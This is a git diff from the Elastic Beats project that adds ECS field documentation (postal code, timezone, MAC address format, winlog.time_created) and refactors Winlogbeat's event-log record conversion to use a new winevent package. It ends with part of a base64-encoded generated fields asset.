-- @@ -6461,6 +6955,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -6483,6 +6989,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -6496,9 +7013,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: @@ -10796,6 +11316,18 @@ required: False -- +*`winlog.time_created`*:: ++ +-- +The event creation time. + + +type: date + +required: False + +-- + *`winlog.process.thread.id`*:: + -- diff --git a/winlogbeat/eventlog/eventlog.go b/winlogbeat/eventlog/eventlog.go index 9302417be2e..88bd4f5fabc 100644 --- a/winlogbeat/eventlog/eventlog.go +++ b/winlogbeat/eventlog/eventlog.go @@ -19,19 +19,15 @@ package eventlog import ( "expvar" - "fmt" - "reflect" "strconv" - "strings" "syscall" "time" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/beats/v7/winlogbeat/checkpoint" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) // Debug selectors used in this package. @@ -55,12 +51,6 @@ var ( readErrors = expvar.NewMap("read_errors") ) -// Keyword Constants -const ( - keywordAuditFailure = 0x10000000000000 - keywordAuditSuccess = 0x20000000000000 -) - // EventLog is an interface to a Windows Event Log. type EventLog interface { // Open the event log. state points to the last successfully read event @@ -81,7 +71,7 @@ type EventLog interface { // Record represents a single event from the log. type Record struct { - sys.Event + winevent.Event File string // Source file when event is from a file. API string // The event log API type used to read the record. XML string // XML representation of the event. @@ -90,78 +80,32 @@ type Record struct { // ToEvent returns a new beat.Event containing the data from this Record. func (e Record) ToEvent() beat.Event { - // Windows Log Specific data - win := common.MapStr{ - "channel": e.Channel, - "event_id": e.EventIdentifier.ID, - "provider_name": e.Provider.Name, - "record_id": e.RecordID, - "task": e.Task, - "api": e.API, - } - addOptional(win, "computer_name", e.Computer) - addOptional(win, "kernel_time", e.Execution.KernelTime) - addOptional(win, "keywords", e.Keywords) - addOptional(win, "opcode", e.Opcode) - addOptional(win, "processor_id", e.Execution.ProcessorID) - addOptional(win, "processor_time", e.Execution.ProcessorTime) - addOptional(win, "provider_guid", e.Provider.GUID) - addOptional(win, "session_id", e.Execution.SessionID) - addOptional(win, "task", e.Task) - addOptional(win, "user_time", e.Execution.UserTime) - addOptional(win, "version", e.Version) - // Correlation - addOptional(win, "activity_id", e.Correlation.ActivityID) - addOptional(win, "related_activity_id", e.Correlation.RelatedActivityID) - // Execution - addOptional(win, "process.pid", e.Execution.ProcessID) - addOptional(win, "process.thread.id", e.Execution.ThreadID) - - if e.User.Identifier != "" { - user := common.MapStr{ - "identifier": e.User.Identifier, - } - win["user"] = user - addOptional(user, "name", e.User.Name) - addOptional(user, "domain", e.User.Domain) - addOptional(user, "type", e.User.Type.String()) - } + win := e.Fields() - addPairs(win, "event_data", e.EventData.Pairs) - userData := addPairs(win, "user_data", e.UserData.Pairs) - addOptional(userData, "xml_name", e.UserData.Name.Local) + win.Delete("time_created") + win.Put("api", e.API) m := common.MapStr{ "winlog": win, } // ECS data + m.Put("event.created", time.Now()) + m.Put("event.kind", "event") m.Put("event.code", e.EventIdentifier.ID) m.Put("event.provider", e.Provider.Name) - addOptional(m, "event.action", e.Task) - addOptional(m, "host.name", e.Computer) - - m.Put("event.created", time.Now()) - if e.KeywordsRaw&keywordAuditFailure > 0 { - m.Put("event.outcome", "failure") - } else if e.KeywordsRaw&keywordAuditSuccess > 0 { - m.Put("event.outcome", "success") - } - - addOptional(m, "log.file.path", e.File) - addOptional(m, "log.level", strings.ToLower(e.Level)) - addOptional(m, "message", sys.RemoveWindowsLineEndings(e.Message)) - // Errors - addOptional(m, "error.code", e.RenderErrorCode) - if len(e.RenderErr) == 1 { - addOptional(m, "error.message", e.RenderErr[0]) - } else { - addOptional(m, "error.message", e.RenderErr) - } + rename(m, "winlog.outcome", "event.outcome") + rename(m, "winlog.level", "log.level") + rename(m, "winlog.message", "message") + rename(m, "winlog.error.code", "error.code") + rename(m, "winlog.error.message", "error.message") - addOptional(m, "event.original", e.XML) + winevent.AddOptional(m, "log.file.path", e.File) + winevent.AddOptional(m, "event.original", e.XML) + winevent.AddOptional(m, "event.action", e.Task) + winevent.AddOptional(m, "host.name", e.Computer) return beat.Event{ Timestamp: e.TimeCreated.SystemTime, @@ -170,76 +114,14 @@ func (e Record) ToEvent() beat.Event { } } -// addOptional adds a key and value to the given MapStr if the value is not the -// zero value for the type of v. It is safe to call the function with a nil -// MapStr. -func addOptional(m common.MapStr, key string, v interface{}) { - if m != nil && !isZero(v) { - m.Put(key, v) - } -} - -// addPairs adds a new dictionary to the given MapStr. The key/value pairs are -// added to the new dictionary. If any keys are duplicates, the first key/value -// pair is added and the remaining duplicates are dropped. -// -// The new dictionary is added to the given MapStr and it is also returned for -// convenience purposes. -func addPairs(m common.MapStr, key string, pairs []sys.KeyValue) common.MapStr { - if len(pairs) == 0 { - return nil - } - - h := make(common.MapStr, len(pairs)) - for i, kv := range pairs { - // Ignore empty values. - if kv.Value == "" { - continue - } - - // If the key name is empty or if it the default of "Data" then - // assign a generic name of paramN. - k := kv.Key - if k == "" || k == "Data" { - k = fmt.Sprintf("param%d", i+1) - } - - // Do not overwrite. - _, exists := h[k] - if !exists { - h[k] = sys.RemoveWindowsLineEndings(kv.Value) - } else { - debugf("Dropping key/value (k=%s, v=%s) pair because key already "+ - "exists. event=%+v", k, kv.Value, m) - } - } - - if len(h) == 0 { - return nil - } - - m[key] = h - return h -} - -// isZero return true if the given value is the zero value for its type. -func isZero(i interface{}) bool { - v := reflect.ValueOf(i) - switch v.Kind() { - case reflect.Array, reflect.String: - return v.Len() == 0 - case reflect.Bool: - return !v.Bool() - case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: - return v.Int() == 0 - case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: - return v.Uint() == 0 - case reflect.Float32, reflect.Float64: - return v.Float() == 0 - case reflect.Interface, reflect.Map, reflect.Ptr, reflect.Slice: - return v.IsNil() +// rename will rename a map entry overriding any previous value +func rename(m common.MapStr, oldKey, newKey string) { + v, err := m.GetValue(oldKey) + if err != nil { + return } - return false + m.Put(newKey, v) + m.Delete(oldKey) } // incrementMetric increments a value in the specified expvar.Map. The key diff --git a/winlogbeat/eventlog/wineventlog.go b/winlogbeat/eventlog/wineventlog.go index 9f832aac0af..6c9ded37c40 100644 --- a/winlogbeat/eventlog/wineventlog.go +++ b/winlogbeat/eventlog/wineventlog.go @@ -36,6 +36,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/checkpoint" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" win "github.com/elastic/beats/v7/winlogbeat/sys/wineventlog" ) @@ -317,14 +318,14 @@ func (l *winEventLog) eventHandles(maxRead int) ([]win.EvtHandle, int, error) { func (l *winEventLog) buildRecordFromXML(x []byte, recoveredErr error) (Record, error) { includeXML := l.config.IncludeXML - e, err := sys.UnmarshalEventXML(x) + e, err := winevent.UnmarshalXML(x) if err != nil { e.RenderErr = append(e.RenderErr, err.Error()) // Add raw XML to event.original when decoding fails includeXML = true } - err = sys.PopulateAccount(&e.User) + err = winevent.PopulateAccount(&e.User) if err != nil { debugf("%s SID %s account lookup failed. %v", l.logPrefix, e.User.Identifier, err) diff --git a/winlogbeat/include/fields.go b/winlogbeat/include/fields.go index 0e9a6e91c4e..0f93a13922c 100644 --- a/winlogbeat/include/fields.go +++ b/winlogbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetBuildFieldsFieldsCommonYml returns asset data. // This is the base64 encoded gzipped contents of build/fields/fields.common.yml. func AssetBuildFieldsFieldsCommonYml() string { - return "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